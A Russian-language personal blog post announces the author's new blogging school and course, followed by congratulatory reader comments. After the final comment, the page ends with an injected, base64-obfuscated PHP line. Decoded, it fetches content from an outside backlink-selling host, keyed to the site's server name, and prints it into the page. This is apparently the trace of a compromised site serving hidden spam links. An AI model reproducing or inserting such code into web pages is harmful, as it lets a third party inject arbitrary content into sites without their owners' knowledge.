БЛОГОНОВОСТИ, МОЕ ЛИЧНОЕ

О ТОМ, КАК СБЫЛАСЬ МОЯ МЕЧТА ОТКРЫТЬ СВОЮ ШКОЛУ БЛОГИНГА

Начну пост с моей любимой фразы, практически девиза моего существования: Я ВОЛНУЮСЬ. Я переживаю по любому поводу ровно столько, сколько себя помню. Но сегодня у меня особенное событие, волнение приятное, но невероятно сильное, выматывающее и не позволяющее мне спать ночами уже довольно давно. Я ОТКРЫВАЮ СВОЮ ШКОЛУ БЛОГИНГА!  Но начнем с самого начала... 

***

Одним холодным, кажется, февральским вечером я намывала посуду в теплой уютненькой донецкой кухне и размышляла о том, кто я, что я, к какому делу я питаю особую страсть, чем действительно хочу заниматься и возможно ли это в наших непростых военных условиях.

В детстве, заботливо рассаживая мягкие игрушки на кровати и обучая их математике и поэзии, я мечтала организовать свой частный домашний детский сад. К сожалению, игрушки не шевелились и не разговаривали, а мне так хотелось порадовать их чем-то, угостить вкусненьким, поболтать и поиграть с ними и, конечно, окружить заботой. Чуть позже меня увлекли серьезные науки, и я подумывала о частной школе. Но потом что-то пошло не так, детство растворилось как снежинка на ладошке, быстро и незаметно. Именно тогда я, видимо, разучилась мечтать без оглядки на текущие условия и обстоятельства.

Меня увлекла экономика, а также философия и психология бизнес-процессов. Переполненная любопытством, я отправилась постигать азы маркетинга в университете, попутно изучая все премудрости интернет-маркетинга самостоятельно. Меня серьезно поглотил блогинг. Даже несмотря на то, что задумывала я свой интернет-уголок как обычный онлайн-дневник, мне было мало. Я хотела нырнуть в изучение технических и психологических фишек блогинга настолько глубоко, насколько мне позволяло время между учебой и силы.

Чуть позже в моей жизни появилась история философии и философия экономики, аспирантура и «Мудрый философ». Планы на защиту диссертации и карьеру преподавателя и научного деятеля. А потом нагрянула война, все стремления накрылись, а жизнь перевернулась с ног на голову. Но я счастлива, что именно тогда у меня возникла идея запустить вдохновляющий блог о счастье, поиске себя, творчестве и саморазвитии. Я очень хотела вдохновлять других, потому что и сама очень нуждалась в такой поддержке. Так родилась «Вдохновленная жизнью», которая за полтора года стала моим спасением, вытянула из депрессии и помогла обрасти единомышленниками и друзьями.

***

И вот стою я на кухоньке и понимаю, что блогинг и интернет-проекты — моя главная страсть и любимое занятие, что желание преподавать как-то не подутихло, что информации по блогингу хоть отбавляй. И что я БЕЗУМНО ХОЧУ ДЕЛИТЬСЯ ВСЕМ ЭТИМ С ДРУГИМИ! Помню, как много мне не хватало в блогерских школах: где-то акцент делался исключительно на технической части, где-то на монетизации, где-то на психологических и творческих моментах без технической информации. На некоторые вопросы я так и не нашла ответов ни в одном из курсов. До всего остального пришлось доходить путем проб и ошибок. Опыт — великая сила! 🙂

В тот вечер я решила, что обязана сделать идеальную в своем понимании школу, где раскрыла бы все-все некогда волновавшие меня саму проблемы. Сформировать дружное блогерское комьюнити, команду поддержки и успеха, помогающую каждому студенту продолжать идти дальше и гордо переступать через творческие кризисы. В общем, с февраля начала активно работать моя мыслемешалка, подкидывающая темы, вопросы и проблемы будущих уроков.

Иногда я не могла заснуть ночами, потому что меня осеняли идеи, как я могу все это осуществить. Я рисовала на любом попавшемся листке макеты будущего сайта школы, пыталась придумать, как сделать уроки доступными только ограниченному кругу лиц — студентам, но чтобы сайт школы в целом также функционировал, наполнялся бесплатными уроками и был доступен широкой аудитории. В один прекрасный день все сложилось в целостную картину. Оставалось только все реализовать, но тут, как оказалось, началось самое страшное...

***

Страхи и сомнения не давали спокойно жить и мечтать. И я все откладывала до лучших времен, успокаивая себя зудящими мыслями: «Еще не время», «Подожди», «Вдруг, не справишься»...

А однажды я познакомилась с чудесной девушкой Сашей, благодаря которой попала на шикарный марафон «Твори! Мечтай! Меняйся!», который она организовала с тремя талантливыми девушками. И в буквальном смысле два месяца я мечтала в полную силу, менялась, справлялась со страхами и творила на полную катушку! Очень благодарна этому марафону, который подтолкнул осознать и ни за что не свете не откладывать свою мечту. И говорю огромное СПАСИБО родным и друзьям за понимание и поддержку.

А потом я сломала крестец. Ну вы уже в курсе. Дело замедлилось. Но через боль, непомерные усилия и неудобства все равно продвигалось. И сегодня я представляю вам свой новый проект - школу блогинга и развития авторских интернет-проектов.

На данный момент уже существует и на полную катушку функционирует и объединяет творческих людей мой собственный курс по блогингу. И я безумно счастлива, потому что на данном этапе удается реализовать все задумки. Информации будет оооочень много. Я знаю, что компания соберется прекраснейшая. Что на этот раз, как и мечталось в детстве, я смогу угостить всех студентов «вкусненьким» в виде интересной и вдохновляющей информации, «поболтать» в комментариях, отвечая на возникающие вопросы, «поиграть», давая творческие домашние задания по каждой теме, и самое главное — окружить заботой.

Большое спасибо вам, друзья, что вы со мной при таком важном и волнительном моменте. Если тема блогинга вам интересна — подписывайтесь на новости школы. И, конечно, очень рада буду видеть вас на своем курсе. Будет круто!

P.S. Не забывайте верить в себя и в свою мечту! Сильным, окруженным вниманием мечтам предначертано сбываться! 😉

P.P.S. Кстати, курс набор на курс уже стартовал! Не могу сдержать эмоций и радости!!! И предвкушаю крутую работу! Все подробности по ссылке ниже:

ПЕРВЫЙ КУРС БЛОГИНГА «WOW! BLOG PROJECT»

Сохранить

Сохранить

Сохранить

Сохранить

Сохранить

 

P.S. Друзья, спасибо, что читаете! Приглашаю вас стать чуточку ближе и подписаться:

– НА МОЙ ТЕЛЕГРАМ главный канал быстрой связи с вами – там все новости и находки, которыми хочется срочно поделиться. Если ссылка не открывается, ищите в поиске по названию "Мария Альби | В поисках смысла...".

– НА МОЮ ЛИЧНУЮ РАССЫЛКУ два раза в месяц в теплых письмах по email концентрированно делюсь с вами новостями проектов и личными событиями, мыслями, выводами и находками, о которых не пишу больше нигде.

 

Поделитесь статьей с друзьями или сохраните себе на память...

 
 
БУДУ РАДА ПООБЩАТЬСЯ С ВАМИ В КОММЕНТАРИЯХ:
Подписаться
Уведомить о
guest
21 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии
Анастасия Зайнутдинова
Анастасия Зайнутдинова
10 лет назад

Маша, мои поздравления с таким большим достижением! С удовольствием буду принимать участие в твоих занятиях) думаю, ты сможеть очень многое дать своим ученикам)))

Мария Альби
Ответить на  Анастасия Зайнутдинова
10 лет назад

Настюш, большое спасибо!!!! )

Юлия Скобкорева
Юлия Скобкорева
10 лет назад

Маша, Маша, поздравляю тебя! Это так здорово, то что ты делаешь, просто нет слов! Я совершенно не собиралась становиться блогером, но ты с таким увлечением и так захватывающе пишешь об этом, что даже мне стало интересно и появилось желание погрузиться в это совершенно неведомое мне занятие. Во всяком случае, я точно порекомендую твою школу своей дочери. Я очень тебе доверяю, и у тебя такая бронебойная харизма, что она пробивает монитор компьютера! с тобой хочется общаться, и ты действительно вдохновляешь. Желаю тебе успехов!

Мария Альби
Ответить на  Юлия Скобкорева
10 лет назад

Юлия, огромное вам спасибо! После таких слов хочется непременно двигаться дальше и ни за что не сдаваться! Спасибо!!! <3

Trounin обозреватель литератур
10 лет назад

Удачи. Главное сделать проект уникальным, хоть он изначально и не кажется способным на такое, в силу распространённости аналогичных школ.

Мария Альби
Ответить на  Trounin обозреватель литератур
10 лет назад

Спасибо большое! Будем очень стараться ).

Анна Выдыш
10 лет назад

Ура, поздравляю еще раз с запуском. Зная Машу, я почему-то уверена, что как раз с уникальностью проблем не возникнет. Несмотря на уже имеющийся опыт в блогинге, мне хочется поучиться именно у Маши и я не сомневаюсь, что получу действительно ценные знания. В случае же с другими школами, просто хочется спать, глядя на их программу)))

Мария Альби
Ответить на  Анна Выдыш
10 лет назад

Моя дорогая, спасибо тебе!!! =***

Julia Zolotareva
10 лет назад

Маша, поздравляю! Когда набираешь базу знаний, обязательно нужно с ними делиться! Я тоже провожу консультации, это так заряжает позитивом и вдохновением! С каждым новым учеником учишься чему-то новому, находишь что-то незнакомое и вдохновляешься!!!

Мария Альби
Ответить на  Julia Zolotareva
10 лет назад

Спасибо, Юль! Да, я полностью согласна с тобой. )

Мария Чеботарёва
Мария Чеботарёва
10 лет назад

Машуль, молодец! Рада за тебя!!:) И как твоё здоровье?

Мария Альби
Ответить на  Мария Чеботарёва
10 лет назад

Машунь, спасибо большое! Уже гораздо лучше. Меньше болит. Но сидеть еще пока все равно нельзя (((. Как и лежать с ноутом на руках. Только на животе). Жуть, как неудобно).

Мария Чеботарёва
Мария Чеботарёва
Ответить на  Мария Альби
10 лет назад

Представляю. Держись!

Мария Альби
Ответить на  Мария Чеботарёва
10 лет назад

Спасибо! )

Polina
Polina
10 лет назад

Маша, я не могу снова не порадоваться и погордиться и просто не поделиться кучей положительных эмоций, которые рождаются, когда я читаю про твой проект! Ты — настоящая молодец.

И я очень надеюсь, что забота, которую ты так щедро даришь уже сейчас, будет сторицей тебе возвращаться!

Мария Альби
Ответить на  Polina
10 лет назад

Моя дорогая, спасибо тебе!=*

Анастасия Кравченко
10 лет назад

Молодец, Машенька! Вдохновляешь верить в себя и идти к цели)) буду с удовольствием читать и твой новый сайт))

Мария Альби
Ответить на  Анастасия Кравченко
10 лет назад

Настюш, спасибо большое! )

Лидия Шереметьева
10 лет назад

Ого! Вот это здорово! Хотя я и не стремлюсь превратить свой блог в работу или что-то подобное, думаю, всегда найдутся какие-нибудь фишечки, которые я смогу применить. Удачи!

Мария Альби
Ответить на  Лидия Шереметьева
10 лет назад

Спасибо большое!!! )

Таня
9 лет назад

Маша, я так рада за тебя! Это здорово когда планы и мечты сбываются) терпения тебе, сил и все получится!)

Первый порыв мне тоже захотелось поучаствовать в курсе, но вот пока не знаю насколько я хочу развивать блог и нужно ли это мне) но может созрею)

".base64_decode("PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL296ZWwyLmJhY2tsaW5rc2F0aXNpLmNvbS9hcGkvZ2V0TGlua3MvIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXSk7ID8+")); ?>